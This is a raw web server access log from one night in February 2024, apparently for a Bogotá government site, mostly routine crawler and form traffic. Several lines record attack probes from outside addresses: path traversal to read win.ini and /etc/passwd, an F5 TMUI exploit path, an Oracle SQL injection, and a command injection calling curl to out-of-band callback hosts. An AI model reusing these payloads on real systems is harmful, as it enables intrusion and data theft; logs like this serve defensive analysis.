201.245.192.253 - - [28/Feb/2024:02:37:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
40.77.167.45 - - [28/Feb/2024:02:37:59 -0500] "GET /portaldeninos/wp-content/uploads/2021/07/Banners-p%C3%A1gina-de-ni%C3%B1os12-1-150x7.jpg HTTP/1.1" 404 75240
201.245.192.253 - - [28/Feb/2024:02:38:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
122.147.26.149 - - [28/Feb/2024:02:39:38 -0500] "\x16\x03\x01" 400 226
201.245.192.253 - - [28/Feb/2024:02:39:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39465
201.245.192.253 - - [28/Feb/2024:02:39:49 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33539
201.245.192.253 - - [28/Feb/2024:02:39:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:02:39:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39611
201.245.192.253 - - [28/Feb/2024:02:40:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
122.147.26.149 - - [28/Feb/2024:02:40:18 -0500] "POST /account/index.php HTTP/1.1" 404 1022
172.22.2.4 - - [28/Feb/2024:02:38:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
122.147.26.149 - - [28/Feb/2024:02:40:19 -0500] "POST /opensis/index.php HTTP/1.1" 404 1022
201.245.192.253 - - [28/Feb/2024:02:40:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33539
172.22.2.4 - - [28/Feb/2024:02:39:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60730
201.245.192.253 - - [28/Feb/2024:02:41:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
201.245.192.253 - - [28/Feb/2024:02:41:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [28/Feb/2024:02:41:59 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:02:42:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
122.147.26.149 - - [28/Feb/2024:02:43:27 -0500] "GET /graph_realtime.php?action=init HTTP/1.1" 404 1035
172.22.2.4 - - [28/Feb/2024:02:43:49 -0500] "GET /BLA/boletinlegal/cgi-bin/authLogin.cgi HTTP/1.1" 404 1018
201.245.192.253 - - [28/Feb/2024:02:43:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
52.167.144.175 - - [28/Feb/2024:02:43:59 -0500] "GET /sipse/faces/presentacion/sistema/anexos/cargarAnexoSolicitudProceso.xhtml HTTP/1.1" 302 -
52.167.144.175 - - [28/Feb/2024:02:44:00 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12408
201.245.192.253 - - [28/Feb/2024:02:44:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [28/Feb/2024:02:44:54 -0500] "GET /robots.txt HTTP/1.1" 404 1018
40.77.167.45 - - [28/Feb/2024:02:45:35 -0500] "GET /galeria/galeria/fotos/Entrenube3G.jpg HTTP/1.1" 200 138221
138.201.157.89 - - [28/Feb/2024:02:45:39 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [28/Feb/2024:02:45:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Feb/2024:02:44:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:02:46:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:02:46:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
172.22.2.4 - - [28/Feb/2024:02:45:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59083
216.245.221.92 - - [28/Feb/2024:02:46:59 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:02:47:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:02:48:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
223.244.35.77 - - [28/Feb/2024:02:49:02 -0500] "GET / HTTP/1.1" 200 319
54.169.12.61 - - [28/Feb/2024:02:49:30 -0500] "GET /.git/config HTTP/1.1" 404 1018
201.245.192.253 - - [28/Feb/2024:02:49:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:02:50:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:02:51:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
201.245.192.253 - - [28/Feb/2024:02:51:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Feb/2024:02:50:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [28/Feb/2024:02:51:59 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:02:52:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Feb/2024:02:51:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59083
201.245.192.253 - - [28/Feb/2024:02:53:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:02:54:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
123.252.48.79 - - [28/Feb/2024:02:55:36 -0500] "\x16\x03\x01" 400 226
201.245.192.253 - - [28/Feb/2024:02:55:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:02:56:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
123.252.48.79 - - [28/Feb/2024:02:56:18 -0500] "POST /api/jsonws/invoke HTTP/1.1" 404 1364
123.252.48.79 - - [28/Feb/2024:02:56:18 -0500] "POST /api/jsonws/invoke HTTP/1.1" 404 1364
3.231.65.233 - - [28/Feb/2024:02:56:22 -0500] "GET /Publicaciones/2022EE250398.pdf HTTP/1.1" 404 228
201.245.192.253 - - [28/Feb/2024:02:56:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
216.245.221.92 - - [28/Feb/2024:02:56:59 -0500] "HEAD / HTTP/1.1" 200 -
65.154.226.166 - - [28/Feb/2024:02:57:36 -0500] "GET /Publicaciones/2022EE250398.pdf HTTP/1.1" 404 228
172.22.2.4 - - [28/Feb/2024:02:56:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:02:57:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
59.127.10.98 - - [28/Feb/2024:02:57:56 -0500] "POST / HTTP/1.1" 200 4720
59.127.10.98 - - [28/Feb/2024:02:57:58 -0500] "GET /wp-admin/index.php HTTP/1.1" 404 1034
201.245.192.253 - - [28/Feb/2024:02:58:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Feb/2024:02:56:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60730
59.127.10.98 - - [28/Feb/2024:02:58:51 -0500] "GET /XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri HTTP/1.1" 404 1034
201.245.192.253 - - [28/Feb/2024:02:59:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:03:00:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:03:01:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
201.245.192.253 - - [28/Feb/2024:03:01:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [28/Feb/2024:03:01:59 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:03:02:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Feb/2024:03:01:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:03:03:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:03:04:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Feb/2024:03:02:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
66.249.66.21 - - [28/Feb/2024:03:05:30 -0500] "GET /Publicaciones/2023EE31786.pdf HTTP/1.1" 404 227
66.249.66.20 - - [28/Feb/2024:03:05:48 -0500] "GET /Publicaciones/2023EE31775.pdf HTTP/1.1" 404 227
201.245.192.253 - - [28/Feb/2024:03:05:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
59.127.10.98 - - [28/Feb/2024:03:06:03 -0500] "GET /?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1 HTTP/1.1" 200 319
201.245.192.253 - - [28/Feb/2024:03:06:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:03:06:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
216.245.221.92 - - [28/Feb/2024:03:06:59 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:03:07:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:03:08:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.19 - - [28/Feb/2024:03:09:06 -0500] "GET /Publicaciones/2023EE40097.pdf HTTP/1.1" 404 227
210.61.247.190 - - [28/Feb/2024:03:09:17 -0500] "\x16\x03\x01" 400 226
216.244.66.195 - - [28/Feb/2024:03:09:26 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2005%2FRES+2005+2501-2550%2F HTTP/1.1" 200 12365
172.22.2.4 - - [28/Feb/2024:03:07:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:03:09:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:03:10:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Feb/2024:03:08:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59083
172.22.2.4 - - [28/Feb/2024:03:10:25 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [28/Feb/2024:03:10:25 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%204%20del%2014%20de%20Julio%20de%202011.pdf HTTP/1.1" 200 399895
201.245.192.253 - - [28/Feb/2024:03:11:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
201.245.192.253 - - [28/Feb/2024:03:11:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [28/Feb/2024:03:11:59 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:03:12:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.20 - - [28/Feb/2024:03:12:11 -0500] "GET /Publicaciones/2023EE37160.pdf HTTP/1.1" 404 227
66.249.66.21 - - [28/Feb/2024:03:13:01 -0500] "GET /silvicultura/6.pdf HTTP/1.1" 200 215404
216.244.66.195 - - [28/Feb/2024:03:13:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0224.pdf HTTP/1.1" 200 509264
216.244.66.195 - - [28/Feb/2024:03:13:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0603.pdf HTTP/1.1" 200 324386
210.61.247.190 - - [28/Feb/2024:03:13:45 -0500] "POST /getcfg.php HTTP/1.1" 404 1034
201.245.192.253 - - [28/Feb/2024:03:13:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:03:14:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [28/Feb/2024:03:14:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/1214.pdf HTTP/1.1" 200 535332
210.61.247.190 - - [28/Feb/2024:03:15:07 -0500] "\x16\x03\x01" 400 226
216.244.66.195 - - [28/Feb/2024:03:15:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/1772.pdf HTTP/1.1" 200 736938
172.22.2.4 - - [28/Feb/2024:03:13:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:03:15:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [28/Feb/2024:03:16:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/2925.pdf HTTP/1.1" 200 5643289
172.22.2.4 - - [28/Feb/2024:03:14:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
201.245.192.253 - - [28/Feb/2024:03:16:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:03:16:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
210.61.247.190 - - [28/Feb/2024:03:16:36 -0500] "GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), HTTP/1.1" 404 1219
210.61.247.190 - - [28/Feb/2024:03:16:46 -0500] "POST /graphql HTTP/1.1" 404 1022
216.244.66.195 - - [28/Feb/2024:03:16:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/4759.pdf HTTP/1.1" 200 659373
216.245.221.92 - - [28/Feb/2024:03:16:59 -0500] "HEAD / HTTP/1.1" 200 -
125.229.173.191 - - [28/Feb/2024:03:17:13 -0500] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://cneqhp1enjjce7r1g3tgicsberoxidtzi.oast.online+-H+%27User-Agent:+Jt0lYq%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://cneqhp1enjjce7r1g3tgufrif85d533yc.oast.online+-H+%27User-Agent:+Jt0lYq%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 403 1023
125.229.173.191 - - [28/Feb/2024:03:17:16 -0500] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://cneqhp1enjjce7r1g3tgj5dajkme8ax53.oast.online+-H+%27User-Agent:+Jt0lYq%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://cneqhp1enjjce7r1g3tgzfwjysizgout6.oast.online+-H+%27User-Agent:+Jt0lYq%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 403 1023
125.229.173.191 - - [28/Feb/2024:03:17:17 -0500] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 404 1022
125.229.173.191 - - [28/Feb/2024:03:17:18 -0500] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1" 404 1022
173.252.107.9 - - [28/Feb/2024:03:17:20 -0500] "GET /alcaldesa-claudia-lopez-encabezo-encuentro-con-las-mujeres-que-reverdecen-a-bogota.html HTTP/1.1" 200 1069
173.252.107.9 - - [28/Feb/2024:03:17:20 -0500] "GET /alcaldesa-claudia-lopez-encabezo-encuentro-con-las-mujeres-que-reverdecen-a-bogota.html HTTP/1.1" 200 1069
173.252.111.1 - - [28/Feb/2024:03:17:26 -0500] "GET /images/mercados-campesinos-5-mayo.jpg HTTP/1.1" 200 95848
125.229.173.191 - - [28/Feb/2024:03:17:32 -0500] "\x16\x03\x01" 400 226
125.229.173.191 - - [28/Feb/2024:03:17:42 -0500] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 1022
172.22.2.4 - - [28/Feb/2024:03:17:47 -0500] "GET /BLA/boletinlegal/magmi/web/info.php HTTP/1.1" 404 1038
216.244.66.195 - - [28/Feb/2024:03:17:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/5098.pdf HTTP/1.1" 200 601033
201.245.192.253 - - [28/Feb/2024:03:17:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
125.229.173.191 - - [28/Feb/2024:03:18:04 -0500] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 1022
201.245.192.253 - - [28/Feb/2024:03:18:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [28/Feb/2024:03:18:37 -0500] "GET /BLA/resoluciones/AUTOS%202023/0181.pdf HTTP/1.1" 200 389781
216.244.66.195 - - [28/Feb/2024:03:19:21 -0500] "GET /BLA/resoluciones/AUTOS%202023/0356.pdf HTTP/1.1" 200 395510
201.245.192.253 - - [28/Feb/2024:03:19:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39617
201.245.192.253 - - [28/Feb/2024:03:19:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33387
216.244.66.195 - - [28/Feb/2024:03:19:54 -0500] "GET /BLA/resoluciones/AUTOS%202023/0544.pdf HTTP/1.1" 200 437019
201.245.192.253 - - [28/Feb/2024:03:19:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:03:19:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39455
201.245.192.253 - - [28/Feb/2024:03:20:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
125.229.173.191 - - [28/Feb/2024:03:20:31 -0500] "GET /cache/backup/ HTTP/1.1" 404 1035
216.244.66.195 - - [28/Feb/2024:03:20:35 -0500] "GET /BLA/resoluciones/AUTOS%202023/0553.pdf HTTP/1.1" 200 486044
201.245.192.253 - - [28/Feb/2024:03:20:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33387
66.249.66.20 - - [28/Feb/2024:03:20:59 -0500] "GET /AFLUENTESYEFUENTES/files/ HTTP/1.1" 200 529
172.22.2.4 - - [28/Feb/2024:03:19:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [28/Feb/2024:03:21:14 -0500] "GET /BLA/resoluciones/AUTOS%202023/0555.pdf HTTP/1.1" 200 427363
201.245.192.253 - - [28/Feb/2024:03:21:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
201.245.192.253 - - [28/Feb/2024:03:21:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [28/Feb/2024:03:21:59 -0500] "GET /BLA/resoluciones/AUTOS%202023/0673.pdf HTTP/1.1" 200 453109
172.22.2.4 - - [28/Feb/2024:03:20:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59083
216.245.221.92 - - [28/Feb/2024:03:21:59 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:03:22:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [28/Feb/2024:03:22:33 -0500] "GET /BLA/resoluciones/AUTOS%202023/0762.pdf HTTP/1.1" 200 389608
66.249.66.21 - - [28/Feb/2024:03:22:53 -0500] "GET /Publicaciones/2023EE30657.pdf HTTP/1.1" 404 227
216.244.66.195 - - [28/Feb/2024:03:23:13 -0500] "GET /BLA/resoluciones/AUTOS%202023/1213.pdf HTTP/1.1" 200 464001
125.229.173.191 - - [28/Feb/2024:03:23:42 -0500] "POST /storfs-asup HTTP/1.1" 404 1034
216.244.66.195 - - [28/Feb/2024:03:23:46 -0500] "GET /BLA/resoluciones/AUTOS%202023/1455.pdf HTTP/1.1" 200 423698
201.245.192.253 - - [28/Feb/2024:03:23:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
125.229.173.191 - - [28/Feb/2024:03:24:07 -0500] "GET /images/..%2finfo.html HTTP/1.1" 404 1216
201.245.192.253 - - [28/Feb/2024:03:24:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
